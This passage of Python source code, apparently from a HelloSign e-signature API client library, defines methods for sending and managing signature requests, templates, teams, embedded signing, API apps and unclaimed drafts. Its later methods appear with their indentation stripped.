            "data_uri" to return it as a base64-encoded string (only applies
            to the "pdf" file_type). When omitted, the file itself is downloaded.
    Returns:
        A PDF/zip file, a URL link to the file, or a base64-encoded file
    '''
    request = self._get_request()
    url = self.SIGNATURE_REQUEST_DOWNLOAD_PDF_URL + signature_request_id
    # "url" / "data_uri" responses come back as JSON; otherwise download the file.
    if response_type == 'url':
        return request.get(url + '?get_url=1')
    if response_type == 'data_uri':
        return request.get(url + '?get_data_uri=1')
    if file_type:
        url += '?file_type=%s' % file_type
    return request.get_file(url, path_or_file or filename)
def send_signature_request(self, test_mode=False, client_id=None, files=None, file_urls=None,
                           title=None, subject=None, message=None, signing_redirect_url=None,
                           signers=None, cc_email_addresses=None, form_fields_per_document=None,
                           use_text_tags=False, hide_text_tags=False, custom_fields=None,
                           metadata=None, allow_decline=False, allow_reassign=False, signing_options=None, attachments=None):
    ''' Create and send a new SignatureRequest with the submitted documents
    If form_fields_per_document is not specified, a signature page will be
    affixed where all signers are required to sign, signifying their
    agreement to all contained documents.
    Args:
        test_mode (bool, optional): When True the request is not legally binding. Defaults to False.
        client_id (str): App client id; for non-embedded requests this enables white-labeling.
        files (list of str): Uploaded file(s) to send for signature. Use either `files` or `file_urls`.
        file_urls (list of str): URLs of files for HelloSign to download and send for signature.
        title (str, optional): Title assigned to the SignatureRequest.
        subject (str, optional): Subject of the email sent to signers.
        message (str, optional): Custom message in the email sent to signers.
        signing_redirect_url (str, optional): URL the signer is redirected to after signing.
        signers (list of dict): Signers, each with: name (str), email_address (str),
            order (str, optional), pin (str, optional: 4- to 12-character access code).
        cc_email_addresses (list, optional): Email addresses to CC on the request.
        form_fields_per_document (str or list of dict, optional): Signer components to place on the
            document(s); see the HelloSign API reference for the serialized format.
        use_text_tags (bool, optional): Use text tags in the file(s) to specify signer components.
        hide_text_tags (bool, optional): Hide text tag areas.
        custom_fields (list of dict, optional): Custom fields defined by text tags, each `{'name': value}`.
        metadata (dict, optional): Metadata associated with the signature request.
        allow_decline (bool, optional): Allow signers to decline to sign. Defaults to False.
        allow_reassign (bool, optional): Allow signers to reassign to other signers. Defaults to False.
        signing_options (dict, optional): Allowed signature types; defaults to account settings.
        attachments (list of dict): Attachments, each with: name (str), instructions (str),
            signer_index (int), required (bool, optional).
    Returns:
        A SignatureRequest object
    '''
    # signers is mandatory; at least one of files/file_urls must be given.
    self._check_required_fields(
        {"signers": signers},
        [{"files": files, "file_urls": file_urls}]
    )
    return self._send_signature_request(
        test_mode=test_mode,
        client_id=client_id,
        files=files,
        file_urls=file_urls,
        title=title,
        subject=subject,
        message=message,
        signing_redirect_url=signing_redirect_url,
        signers=signers,
        cc_email_addresses=cc_email_addresses,
        form_fields_per_document=form_fields_per_document,
        use_text_tags=use_text_tags,
        hide_text_tags=hide_text_tags,
        custom_fields=custom_fields,
        metadata=metadata,
        allow_decline=allow_decline,
        allow_reassign=allow_reassign,
        signing_options=signing_options,
        attachments=attachments
    )
def send_signature_request_with_template(self, test_mode=False, template_id=None,
                                         template_ids=None, title=None, subject=None, message=None,
                                         signing_redirect_url=None, signers=None, ccs=None, custom_fields=None,
                                         metadata=None, allow_decline=False, files=None, file_urls=None, signing_options=None):
    ''' Create and send a new SignatureRequest based off of a Template
    Uses the Template given by template_id (or template_ids) to build and
    send the SignatureRequest.
    Args:
        test_mode (bool, optional): When True the request is not legally binding. Defaults to False.
        template_id (str): Template id to use. Mutually exclusive with template_ids.
        template_ids (list): Template ids to use. Mutually exclusive with template_id.
        title (str, optional): Title assigned to the SignatureRequest.
        subject (str, optional): Subject of the email sent to signers.
        message (str, optional): Custom message in the email sent to signers.
        signing_redirect_url (str, optional): URL the signer is redirected to after signing.
        signers (list of dict): Signers, each with: role_name (str), name (str),
            email_address (str), pin (str, optional: 4- to 12-character access code).
        ccs (list of dict, optional): CC recipients, required when the Template has CC roles.
            Each dict has: role_name (str), email_address (str).
        custom_fields (list of dict, optional): Required when the Template defines CustomFields.
            Each item looks like `{'name': value}`.
        metadata (dict, optional): Metadata to associate with the signature request.
        allow_decline (bool, optional): Allow signers to decline to sign. Defaults to False.
        files (list of str): File(s) to append to the request. Use either `files` or `file_urls`.
        file_urls (list of str): URLs of files for HelloSign to download and append.
        signing_options (dict, optional): Allowed signature types; defaults to account settings.
    Returns:
        A SignatureRequest object
    '''
    # signers is mandatory; one of template_id/template_ids/files/file_urls must be given.
    self._check_required_fields(
        {"signers": signers},
        [{"template_id": template_id, "template_ids": template_ids, "files": files, "file_urls": file_urls}]
    )
    return self._send_signature_request_with_template(
        test_mode=test_mode,
        template_id=template_id,
        template_ids=template_ids,
        title=title,
        subject=subject,
        message=message,
        signing_redirect_url=signing_redirect_url,
        signers=signers,
        ccs=ccs,
        custom_fields=custom_fields,
        metadata=metadata,
        allow_decline=allow_decline,
        files=files,
        file_urls=file_urls,
        signing_options=signing_options
    )
@api_resource(SignatureRequest)
def remind_signature_request(self, signature_request_id, email_address, name=None):
    ''' Email a signer a reminder to sign the signature request
    A reminder cannot be sent within 1 hour of the previous reminder,
    whether manual or automatic.
    Args:
        signature_request_id (str): Id of the SignatureRequest to send a reminder for
        email_address (str): Email address of the signer to remind
        name (str, optional): Name of the signer to remind
    Returns:
        A SignatureRequest object
    '''
    payload = {"email_address": email_address, "name": name}
    return self._get_request().post(self.SIGNATURE_REQUEST_REMIND_URL + signature_request_id, data=payload)
@api_resource(SignatureRequest)
def update_signature_request(self, signature_request_id, signature_id, email_address):
    ''' Update the email address of a signer on a signature request
    Args:
        signature_request_id (str): Id of the SignatureRequest to update
        signature_id (str): Signature id of the recipient to change
        email_address (str): New email address for that recipient
    Returns:
        A SignatureRequest object
    '''
    payload = {
        "signature_id": signature_id,
        "email_address": email_address
    }
    return self._get_request().post(self.SIGNATURE_REQUEST_UPDATE_URL + signature_request_id, data=payload)
def cancel_signature_request(self, signature_request_id):
    ''' Cancel a SignatureRequest
    After canceling, nobody can sign or access the SignatureRequest or its
    documents. Only the requester can cancel, and only before everyone has
    signed.
    Args:
        signature_request_id (str): Id of the signature request to cancel
    Returns:
        None
    '''
    cancel_url = self.SIGNATURE_REQUEST_CANCEL_URL + signature_request_id
    # The endpoint returns no JSON body on success.
    self._get_request().post(url=cancel_url, get_json=False)
def remove_signature_request_access(self, signature_request_id):
    ''' Remove your access to a completed SignatureRequest
    The SignatureRequest must be fully executed by all parties (signed or
    declined to sign). Other parties keep access to the completed document(s).
    Args:
        signature_request_id (str): Id of the signature request to remove
    Returns:
        None
    '''
    removal_url = self.SIGNATURE_REQUEST_REMOVE_ACCESS_URL + signature_request_id
    # The endpoint returns no JSON body on success.
    self._get_request().post(url=removal_url, get_json=False)
def send_signature_request_embedded(self, test_mode=False, client_id=None,
                                    files=None, file_urls=None, title=None, subject=None, message=None,
                                    signing_redirect_url=None, signers=None, cc_email_addresses=None,
                                    form_fields_per_document=None, use_text_tags=False, hide_text_tags=False,
                                    metadata=None, allow_decline=False, allow_reassign=False, signing_options=None, attachments=None):
    ''' Create a new SignatureRequest to be signed in an embedded iFrame
    If form_fields_per_document or text tags are not specified, a signature
    page will be affixed where all signers must sign. Embedded signature
    requests can only be signed inside embedded iFrames, whereas normal
    signature requests can only be signed on HelloSign.
    Args:
        test_mode (bool, optional): When True the request is not legally binding. Defaults to False.
        client_id (str): Client id of the app used to create this embedded signature request.
        files (list of str): Uploaded file(s) to send for signature. Use either `files` or `file_urls`.
        file_urls (list of str): URLs of files for HelloSign to download and send for signature.
        title (str, optional): Title assigned to the SignatureRequest.
        subject (str, optional): Subject of the email sent to signers.
        message (str, optional): Custom message in the email sent to signers.
        signing_redirect_url (str, optional): URL the signer is redirected to after signing.
        signers (list of dict): Signers, each with: name (str), email_address (str),
            order (str, optional), pin (str, optional: 4- to 12-character access code).
        cc_email_addresses (list, optional): Email addresses to CC.
        form_fields_per_document (str or list of dict, optional): Fields to place on the document(s);
            see the HelloSign API reference for the serialized format.
        use_text_tags (bool, optional): Use text tags in the file(s) to create form fields.
        hide_text_tags (bool, optional): Hide text tag areas.
        metadata (dict, optional): Metadata to associate with the signature request.
        allow_decline (bool, optional): Allow signers to decline to sign. Defaults to False.
        allow_reassign (bool, optional): Allow signers to reassign to other signers. Defaults to False.
        signing_options (dict, optional): Allowed signature types; defaults to account settings.
        attachments (list of dict): Attachments, each with: name (str), instructions (str),
            signer_index (int), required (bool, optional).
    Returns:
        A SignatureRequest object
    '''
    # signers and client_id are mandatory; one of files/file_urls must be given.
    self._check_required_fields(
        {"signers": signers, "client_id": client_id},
        [{"files": files, "file_urls": file_urls}]
    )
    return self._send_signature_request(
        test_mode=test_mode,
        client_id=client_id,
        files=files,
        file_urls=file_urls,
        title=title,
        subject=subject,
        message=message,
        signing_redirect_url=signing_redirect_url,
        signers=signers,
        cc_email_addresses=cc_email_addresses,
        form_fields_per_document=form_fields_per_document,
        use_text_tags=use_text_tags,
        hide_text_tags=hide_text_tags,
        metadata=metadata,
        allow_decline=allow_decline,
        allow_reassign=allow_reassign,
        signing_options=signing_options,
        is_for_embedded_signing=True,
        attachments=attachments
    )
def send_signature_request_embedded_with_template(self, test_mode=False,
                                                  client_id=None, template_id=None, template_ids=None, title=None,
                                                  subject=None, message=None, signing_redirect_url=None, signers=None,
                                                  ccs=None, custom_fields=None, metadata=None, allow_decline=False,
                                                  files=None, file_urls=None, signing_options=None):
    ''' Create a SignatureRequest from a Template, signed in an embedded iFrame
    Embedded signature requests can only be signed inside embedded iFrames,
    whereas normal signature requests can only be signed on HelloSign.
    Args:
        test_mode (bool, optional): When True the request is not legally binding. Defaults to False.
        client_id (str): Client id of the app used to create this embedded signature request.
        template_id (str): Template id to use. Mutually exclusive with template_ids.
        template_ids (list): Template ids to use. Mutually exclusive with template_id.
        title (str, optional): Title assigned to the SignatureRequest.
        subject (str, optional): Subject of the email sent to signers.
        message (str, optional): Custom message in the email sent to signers.
        signing_redirect_url (str, optional): URL the signer is redirected to after signing.
        signers (list of dict): Signers, each with: name (str), email_address (str),
            pin (str, optional: 4- to 12-character access code).
        ccs (list of dict, optional): CC recipients, required when the Template has CC roles.
            Each dict has: role_name (str), email_address (str).
        custom_fields (list of dict, optional): Required when the Template defines CustomFields.
            Each item looks like `{'name': value}`.
        metadata (dict, optional): Metadata to associate with the signature request.
        allow_decline (bool, optional): Allow signers to decline to sign. Defaults to False.
        files (list of str): File(s) to append to the request. Use either `files` or `file_urls`.
        file_urls (list of str): URLs of files for HelloSign to download and append.
        signing_options (dict, optional): Allowed signature types; defaults to account settings.
    Returns:
        A SignatureRequest object
    '''
    # signers and client_id are mandatory; one of template_id/template_ids/files/file_urls must be given.
    self._check_required_fields(
        {"signers": signers, "client_id": client_id},
        [{"template_id": template_id, "template_ids": template_ids, "files": files, "file_urls": file_urls}]
    )
    return self._send_signature_request_with_template(
        test_mode=test_mode,
        client_id=client_id,
        template_id=template_id,
        template_ids=template_ids,
        title=title,
        subject=subject,
        message=message,
        signing_redirect_url=signing_redirect_url,
        signers=signers,
        ccs=ccs,
        custom_fields=custom_fields,
        metadata=metadata,
        allow_decline=allow_decline,
        files=files,
        file_urls=file_urls,
        signing_options=signing_options
    )
# ---- TEMPLATE METHODS -----------------------
@api_resource(Template)
def get_template(self, template_id):
    ''' Fetch a Template, including the list of Accounts that can access it
    Args:
        template_id (str): Id of the template to retrieve
    Returns:
        A Template object
    '''
    return self._get_request().get(self.TEMPLATE_GET_URL + template_id)
@api_resource_list(Template)
def get_template_list(self, page=1, page_size=None, account_id=None, query=None):
    ''' List your Templates
    Args:
        page (int, optional): Page number of the template list to return. Defaults to 1.
        page_size (int, optional): Objects per page, between 1 and 100; the API defaults to 20.
        account_id (str, optional): Team member account to return Templates for;
            "all" for every team member. Defaults to your account.
        query (str, optional): Search terms and/or fields used to filter the Template objects.
    Returns:
        A ResourceList object
    '''
    query_params = {
        'page': page,
        'page_size': page_size,
        'account_id': account_id,
        'query': query
    }
    return self._get_request().get(self.TEMPLATE_GET_LIST_URL, parameters=query_params)
# RECOMMEND: this api does not fail if the user has been added...
def add_user_to_template(self, template_id, account_id=None, email_address=None):
    ''' Gives the specified Account access to the specified Template
    Note: the API call succeeds even if the account already has access.
    Args:
        template_id (str): The id of the template to give the account access to
        account_id (str): The id of the account to give access to the template. The account id prevails if both account_id and email_address are provided.
        email_address (str): The email address of the account to give access to.
    Returns:
        A Template object
    '''
    # Delegates to the shared add/remove helper; only the endpoint URL differs.
    return self._add_remove_user_template(self.TEMPLATE_ADD_USER_URL, template_id, account_id, email_address)
def remove_user_from_template(self, template_id, account_id=None, email_address=None):
    ''' Removes the specified Account's access to the specified Template
    Args:
        template_id (str): The id of the template to remove the account's access from.
        account_id (str): The id of the account to remove access from the template.
            The account id prevails if both account_id and email_address are provided.
        email_address (str): The email address of the account to remove access from.
    Returns:
        A Template object
    '''
    # Delegates to the shared add/remove helper; only the endpoint URL differs.
    return self._add_remove_user_template(self.TEMPLATE_REMOVE_USER_URL, template_id, account_id, email_address)
def delete_template(self, template_id):
    ''' Deletes the specified template
    Args:
        template_id (str): Id of the template to delete
    Returns:
        The raw response (a status code); JSON parsing is disabled for this call
    '''
    return self._get_request().post(self.TEMPLATE_DELETE_URL + template_id, get_json=False)
def get_template_files(self, template_id, path_or_file=None, file_type=None,
                       filename=None, response_type=None):
    ''' Downloads a copy of a template's original files
    Fix: previously `response_type` was silently ignored whenever `file_type`
    was set, and omitting both fell through to a plain JSON GET instead of
    downloading the file. Branching now mirrors get_signature_request_file:
    `response_type` takes precedence; otherwise the file is downloaded.
    Args:
        template_id (str): id of the template to download
        path_or_file (str or file): A writable File-like object or a full path to save the PDF file to.
        filename (str): [DEPRECATED] Filename to save the PDF file to. This should be a full path.
        file_type (str): Type of file to return. Either "pdf" for a single merged document or
            "zip" for a collection of individual documents. Defaults to "pdf" if not specified.
        response_type (str): File type of response to return. Either "url" to return a URL link to the file
            or "data_uri" to return the file as a base64 encoded string. Only applicable to the "pdf" file_type.
    Returns:
        Returns a PDF file, URL link to file, or base64 encoded file
    '''
    request = self._get_request()
    url = self.TEMPLATE_GET_FILES_URL + template_id
    if response_type == 'url':
        # Link responses come back as JSON rather than file content.
        url += '?get_url=1'
    elif response_type == 'data_uri':
        url += '?get_data_uri=1'
    else:
        if file_type:
            url += '?file_type=%s' % file_type
        return request.get_file(url, path_or_file or filename)
    return request.get(url)
def update_template_files(self, template_id, files=None, file_urls=None,
                          subject=None, message=None, client_id=None, test_mode=False):
    ''' Overlays a new file with the overlay of an existing template
    Args:
        template_id (str): Id of the template whose files to update
        files (list of str): File(s) to use for the template.
        file_urls (list of str): URLs of files for HelloSign to use for the template.
            Use either `files` or `file_urls`, but not both.
        subject (str, optional): Default template email subject
        message (str, optional): Default template email message
        client_id (str): Client id of the app associated with the Template
        test_mode (bool, optional): When True, signature requests created from
            this Template are not legally binding. Defaults to False.
    Returns:
        A Template object
    '''
    payload = {
        "files": files,
        "file_urls": file_urls,
        "subject": subject,
        "message": message,
        "test_mode": self._boolean(test_mode),  # API expects a serialized boolean
        "client_id": client_id
    }
    return self._get_request().post(self.TEMPLATE_UPDATE_FILES_URL + template_id, data=payload)
def create_embedded_template_draft(self, client_id, signer_roles, test_mode=False,
files=None, file_urls=None, title=None, subject=None, message=None,
cc_roles=None, merge_fields=None, skip_me_now=False, use_preexisting_fields=False,
allow_reassign=False, metadata=None, allow_ccs=False, attachments=None):
''' Creates an embedded Template draft for further editing.
Args:
test_mode (bool, optional): Whether this is a test, the signature request
created from this draft will not be legally binding if set to 1. Defaults to 0.
client_id (str): Client id of the app you're using to create this draft.
files (list of str): The file(s) to use for the template.
file_urls (list of str): URLs of the file for HelloSign to use for the template.
Use either `files` or `file_urls`, but not both.
title (str, optional): The template title
subject (str, optional): The default template email subject
message (str, optional): The default template email message
signer_roles (list of dict): A list of signer roles, each of which has the following attributes:
name (str): The role name of the signer that will be displayed when the
template is used to create a signature request.
order (str, optional): The order in which this signer role is required to sign.
cc_roles (list of str, optional): The CC roles that must be assigned when using the template to send a signature request
merge_fields (list of dict, optional): The merge fields that can be placed on the template's
document(s) by the user claiming the template draft. Each must have the following two parameters:
name (str): The name of the merge field. Must be unique.
type (str): Can only be "text" or "checkbox".
skip_me_now (bool, optional): Disables the "Me (Now)" option for the document's preparer. Defaults to 0.
use_preexisting_fields (bool, optional): Whether to use preexisting PDF fields
metadata (dict, optional): Metadata to associate with the draft
allow_reassign (bool, optional): Allows signers to reassign their signature
requests to other signers if set to True. Defaults to False.
allow_ccs (bool, optional): Specifies whether the user is allowed to
provide email addresses to CC when creating a template. Defaults to False.
attachments (list of dict): A list of attachments, each with the following attributes:
name (str): The name of the attachment
instructions (str): The instructions for uploading the attachment
signer_index (int): The index of the signer who needs to upload the attachments, see signers parameter for more details
required (bool, optional): Determines if the attachment must be uploaded
Returns:
A Template object specifying the id of the draft
'''
params = {
'test_mode': test_mode,
'client_id': client_id,
'files': files,
'file_urls': file_urls,
'title': title,
'subject': subject,
'message': message,
'signer_roles': signer_roles,
'cc_roles': cc_roles,
'merge_fields': merge_fields,
'skip_me_now': skip_me_now,
'use_preexisting_fields': use_preexisting_fields,
'metadata': metadata,
'allow_reassign': allow_reassign,
'allow_ccs': allow_ccs,
'attachments': attachments
}
return self._create_embedded_template_draft(**params)
# ---- TEAM METHODS --------------------------------
@api_resource(Team)
def get_team_info(self):
''' Gets your Team and a list of its members
Returns information about your team as well as a list of its members.
If you do not belong to a team, a 404 error with an error_name of
"not_found" will be returned.
Returns:
A Team object
'''
request = self._get_request()
return request.get(self.TEAM_INFO_URL)
@api_resource(Team)
def create_team(self, name):
''' Creates a new Team
Creates a new Team and makes you a member. You must not currently belong to a team to invoke.
Args:
name (str): The name of your team
Returns:
A Team object
'''
request = self._get_request()
return request.post(self.TEAM_CREATE_URL, {"name": name})
    # NOTE: The API will create a new team if you do not belong to any team
@api_resource(Team)
def update_team_name(self, name):
''' Updates a Team's name
Args:
name (str): The new name of your team
Returns:
A Team object
'''
request = self._get_request()
return request.post(self.TEAM_UPDATE_URL, {"name": name})
def destroy_team(self):
''' Delete your Team
Deletes your Team. Can only be invoked when you have a team with only one member left (yourself).
Returns:
None
'''
request = self._get_request()
request.post(url=self.TEAM_DESTROY_URL, get_json=False)
def add_team_member(self, account_id=None, email_address=None):
''' Add or invite a user to your Team
Args:
account_id (str): The id of the account of the user to invite to your team.
email_address (str): The email address of the account to invite to your team.
The account id prevails if both account_id and email_address are provided.
Returns:
A Team object
'''
return self._add_remove_team_member(self.TEAM_ADD_MEMBER_URL, email_address, account_id)
# RECOMMEND: Does not fail if user has been removed
def remove_team_member(self, account_id=None, email_address=None):
''' Remove a user from your Team
Args:
account_id (str): The id of the account of the user to remove from your team.
email_address (str): The email address of the account to remove from your team.
The account id prevails if both account_id and email_address are provided.
Returns:
A Team object
'''
return self._add_remove_team_member(self.TEAM_REMOVE_MEMBER_URL, email_address, account_id)
# ---- EMBEDDED METHODS ----------------------------
@api_resource(Embedded)
def get_embedded_object(self, signature_id):
''' Retrieves an embedded signing object
Retrieves an embedded object containing a signature url that can be opened in an iFrame.
Args:
signature_id (str): The id of the signature to get a signature url for
Returns:
An Embedded object
'''
request = self._get_request()
return request.get(self.EMBEDDED_OBJECT_GET_URL + signature_id)
@api_resource(Embedded)
def get_template_edit_url(self, template_id, test_mode=False, cc_roles=None,
merge_fields=None, skip_signer_roles=False, skip_subject_message=False):
''' Retrieves a embedded template for editing
Retrieves an embedded object containing a template edit url that can be opened in an iFrame.
Args:
template_id (str): The id of the template to get an edit url for
test_mode (bool, optional): Whether this is a test, the signature requests created
from this template will not be legally binding if set to True. Defaults to False.
cc_roles (list of str, optional): The CC roles that must be assigned when using
the template to send a signature request
merge_fields (list of dict, optional): The merge fields that can be placed on the template's document(s)
by the user claiming the template draft. Each must have the following two parameters:
name (str): The name of the merge field. Must be unique.
type (str): Can only be "text" or "checkbox".
skip_me_now (bool, optional): Disables the "Me (Now)" option for the document's preparer.
Defaults to False.
skip_subject_message (bool, optional): Disables the option to edit the template's default
subject and message. Defaults to False.
Returns:
An Embedded object
'''
# Prep CCs
ccs_payload = HSFormat.format_param_list(cc_roles, 'cc_roles')
# Prep Merge Fields
merge_fields_payload = {
'merge_fields': json.dumps(merge_fields)
}
payload = {
"test_mode": self._boolean(test_mode),
"skip_signer_roles": self._boolean(skip_signer_roles),
"skip_subject_message": self._boolean(skip_subject_message)
}
# remove attributes with none value
payload = HSFormat.strip_none_values(payload)
url = self.EMBEDDED_TEMPLATE_EDIT_URL + template_id
data = {}
data.update(payload)
data.update(ccs_payload)
data.update(merge_fields_payload)
request = self._get_request()
response = request.post(url, data=data)
return response
# ---- API APP METHODS --------------------------------
@api_resource(ApiApp)
def get_api_app_info(self, client_id):
''' Gets an API App by its Client ID
Returns information about the specified API App
Returns:
An ApiApp object
'''
request = self._get_request()
return request.get(self.API_APP_INFO_URL + client_id)
@api_resource_list(ApiApp)
def get_api_app_list(self, page=1, page_size=None):
''' Lists your API Apps
Args:
page (int, optional): Page number of the API App List to return. Defaults to 1.
page_size (int, optional): Number of objects to be returned per page, must be between 1 and 100, default is 20.
Returns:
A ResourceList object
'''
request = self._get_request()
parameters = {
'page': page,
'page_size': page_size
}
return request.get(self.API_APP_LIST_URL, parameters=parameters)
@api_resource(ApiApp)
def create_api_app(self, name, domain, callback_url=None, custom_logo_file=None,
oauth_callback_url=None, oauth_scopes=None, white_labeling_options=None,
option_insert_everywhere=False):
''' Creates a new API App
Creates a new API App with the specified settings.
Args:
name (str): The name of the API App
domain (str): The domain name associated with the API App
callback_url (str, optional): The URL that HelloSign events will be POSTed to
custom_logo_file (str, optional): The image file to use as a custom logo
oauth_callback_url (str, optional): The URL that HelloSign OAuth events will be POSTed to
oauth_scopes (list of str, optional): List of the API App's OAuth scopes
white_labeling_options (dict, optional): Customization options for the API App's signer page
option_insert_everywhere (bool, optional): Denotes if signers can "Insert Everywhere" when
signing a document
Returns:
An ApiApp object
'''
# Prep custom logo
custom_logo_payload = HSFormat.format_logo_params(custom_logo_file)
payload = {
"name": name,
"domain": domain,
"callback_url": callback_url,
"oauth[callback_url]": oauth_callback_url,
"oauth[scopes]": oauth_scopes,
"white_labeling_options": json.dumps(white_labeling_options),
"options[can_insert_everywhere]": self._boolean(option_insert_everywhere)
}
# remove attributes with none value
payload = HSFormat.strip_none_values(payload)
request = self._get_request()
return request.post(self.API_APP_CREATE_URL, data=payload, files=custom_logo_payload)
@api_resource(ApiApp)
def update_api_app(self, client_id, name=None, domain=None, callback_url=None,
custom_logo_file=None, oauth_callback_url=None, oauth_scopes=None,
white_labeling_options=None, option_insert_everywhere=False):
''' Updates the specified API App
Updates an API App with the specified settings.
Args:
name (str): The name of the API App
domain (str): The domain name associated with the API App
callback_url (str, optional): The URL that HelloSign events will be POSTed to
custom_logo_file (str, optional): The image file to use as a custom logo
oauth_callback_url (str, optional): The URL that HelloSign OAuth events will be POSTed to
oauth_scopes (list of str, optional): List of the API App's OAuth scopes
white_labeling_options (dict, optional): Customization options for the API App's signer page
option_insert_everywhere (bool, optional): Denotes if signers can "Insert Everywhere" when
signing a document
Returns:
An ApiApp object
'''
# Prep custom logo
custom_logo_payload = HSFormat.format_logo_params(custom_logo_file)
payload = {
"name": name,
"domain": domain,
"callback_url": callback_url,
"oauth[callback_url]": oauth_callback_url,
"oauth[scopes]": oauth_scopes,
"white_labeling_options": json.dumps(white_labeling_options),
"options[can_insert_everywhere]": self._boolean(option_insert_everywhere)
}
# remove attributes with none value
payload = HSFormat.strip_none_values(payload)
request = self._get_request()
url = self.API_APP_UPDATE_URL + client_id
return request.post(url, data=payload, files=custom_logo_payload)
def delete_api_app(self, client_id):
''' Deletes the specified API App
Deletes an API App. Can only be involved for API Apps you own.
Returns:
None
'''
request = self._get_request()
request.delete(url=self.API_APP_DELETE_URL + client_id)
# ---- UNCLAIMED DRAFT METHODS ---------------------
def create_unclaimed_draft(self, test_mode=False, files=None, file_urls=None,
draft_type=None, subject=None, message=None, signers=None, custom_fields=None,
cc_email_addresses=None, signing_redirect_url=None, form_fields_per_document=None,
metadata=None, use_preexisting_fields=False, use_text_tags=False,
hide_text_tags=False, allow_decline=False, signing_options=None, attachments=None):
''' Creates a new Draft that can be claimed using the claim URL
Creates a new Draft that can be claimed using the claim URL. The first
authenticated user to access the URL will claim the Draft and will be
shown either the "Sign and send" or the "Request signature" page with
the Draft loaded. Subsequent access to the claim URL will result in a
404. If the type is "send_document" then only the file parameter is
required. If the type is "request_signature", then the identities of the
signers and optionally the location of signing elements on the page are
also required.
Args:
test_mode (bool, optional): Whether this is a test, the signature request created from this draft will not be legally binding if set to True. Defaults to False.
files (list of str): The uploaded file(s) to send for signature
file_urls (list of str): URLs of the file for HelloSign to download to send for signature. Use either `files` or `file_urls`
draft_type (str): The type of unclaimed draft to create. Use "send_document" to create a claimable file, and "request_signature"
for a claimable signature request. If the type is "request_signature" then signers name and email_address are not optional.
subject (str, optional): The subject in the email that will be sent to the signers
message (str, optional): The custom message in the email that will be sent to the signers
signers (list of dict): A list of signers, which each has the following attributes:
name (str): The name of the signer
email_address (str): Email address of the signer
order (str, optional): The order the signer is required to sign in
custom_fields (list of dict, optional): A list of custom fields. Required when a CustomField exists in the Template.
An item of the list should look like this: `{'name: value'}`
cc_email_addresses (list of str, optional): A list of email addresses that should be CC'd
signing_redirect_url (str, optional): The URL you want the signer redirected to after they successfully sign.
form_fields_per_document (str or list of dict, optional): The fields that should appear on the document, expressed as a serialized JSON
data structure which is a list of lists of the form fields. Please refer to the API reference of HelloSign for more details (https://www.hellosign.com/api/reference#SignatureRequest)
metadata (dict, optional): Metadata to associate with the draft
use_preexisting_fields (bool): Whether to use preexisting PDF fields
use_text_tags (bool, optional): Use text tags in the provided file(s) to create form fields
hide_text_tags (bool, optional): Hide text tag areas
allow_decline (bool, optional): Allows signers to decline to sign a document if set to 1. Defaults to 0.
signing_options (dict, optional): Allows the requester to specify the types allowed for creating a signature.
Defaults to account settings.
attachments (list of dict): A list of attachments, each with the following attributes:
name (str): The name of the attachment
instructions (str): The instructions for uploading the attachment
signer_index (int): The index of the signer who needs to upload the attachments, see signers parameter for more details
required (bool, optional): Determines if the attachment must be uploaded
Returns:
An UnclaimedDraft object
'''
self._check_required_fields({
'draft_type': draft_type
}, [{
"files": files,
"file_urls": file_urls
}]
)
params = {
'test_mode': test_mode,
'files': files,
'file_urls': file_urls,
'draft_type': draft_type,
'subject': subject,
'message': message,
'signing_redirect_url': signing_redirect_url,
'signers': signers,
'custom_fields': custom_fields,
'cc_email_addresses': cc_email_addresses,
'form_fields_per_document': form_fields_per_document,
'metadata': metadata,
'use_preexisting_fields': use_preexisting_fields,
'use_text_tags': use_text_tags,
'hide_text_tags': hide_text_tags,
'allow_decline': allow_decline,
'signing_options': signing_options,
'attachments': attachments
}
return self._create_unclaimed_draft(**params)
def create_embedded_unclaimed_draft(self, test_mode=False, client_id=None,
is_for_embedded_signing=False, requester_email_address=None, files=None,
file_urls=None, draft_type=None, subject=None, message=None, signers=None,
custom_fields=None, cc_email_addresses=None, signing_redirect_url=None,
requesting_redirect_url=None, form_fields_per_document=None, metadata=None,
use_preexisting_fields=False, use_text_tags=False, hide_text_tags=False,
skip_me_now=False, allow_decline=False, allow_reassign=False,
signing_options=None, allow_ccs=False, attachments=None):
''' Creates a new Draft to be used for embedded requesting
Args:
test_mode (bool, optional): Whether this is a test, the signature request created from this draft will not be legally binding if set to True. Defaults to False.
client_id (str): Client id of the app used to create the embedded draft.
is_for_embedded_signing (bool, optional): Whether this is also for embedded signing. Defaults to False.
requester_email_address (str): Email address of the requester.
files (list of str): The uploaded file(s) to send for signature.
file_urls (list of str): URLs of the file for HelloSign to download to send for signature. Use either `files` or `file_urls`
draft_type (str): The type of unclaimed draft to create. Use "send_document" to create a claimable file, and "request_signature" for a claimable signature request. If the type is "request_signature" then signers name and email_address are not optional.
subject (str, optional): The subject in the email that will be sent to the signers
message (str, optional): The custom message in the email that will be sent to the signers
signers (list of dict): A list of signers, which each has the following attributes:
name (str): The name of the signer
email_address (str): Email address of the signer
order (str, optional): The order the signer is required to sign in
custom_fields (list of dict, optional): A list of custom fields. Required when a CustomField exists using text tags for form_fields_per_document. An item of the list should look like this: `{'name: value'}`
cc_email_addresses (list of str, optional): A list of email addresses that should be CC'd
signing_redirect_url (str, optional): The URL you want the signer redirected to after they successfully sign.
requesting_redirect_url (str, optional): The URL you want the signer to be redirected to after the request has been sent.
form_fields_per_document (str or list of dict, optional): The fields that should appear on the document, expressed as a serialized JSON data structure which is a list of lists of the form fields. Please refer to the API reference of HelloSign for more details (https://www.hellosign.com/api/reference#SignatureRequest)
metadata (dict, optional): Metadata to associate with the draft
use_preexisting_fields (bool): Whether to use preexisting PDF fields
use_text_tags (bool, optional): Use text tags in the provided file(s) to create form fields
hide_text_tags (bool, optional): Hide text tag areas
skip_me_now (bool, optional): Disables the "Me (Now)" option for the document's preparer. Defaults to 0.
signing_options (dict, optional): Allows the requester to specify the types allowed for creating a signature. Defaults to account settings.
allow_decline (bool, optional): Allows signers to decline to sign a document if set to 1. Defaults to 0.
allow_ccs (bool, optional): Specifies whether the user is allowed to provide email addresses to CC when sending the request. Defaults to False.
attachments (list of dict): A list of attachments, each with the following attributes:
name (str): The name of the attachment
instructions (str): The instructions for uploading the attachment
signer_index (int): The index of the signer who needs to upload the attachments, see signers parameter for more details
required (bool, optional): Determines if the attachment must be uploaded
Returns:
An UnclaimedDraft object
'''
self._check_required_fields({
'client_id': client_id,
'requester_email_address': requester_email_address,
'draft_type': draft_type
}, [{
"files": files,
"file_urls": file_urls
}]
)
params = {
'test_mode': test_mode,
'client_id': client_id,
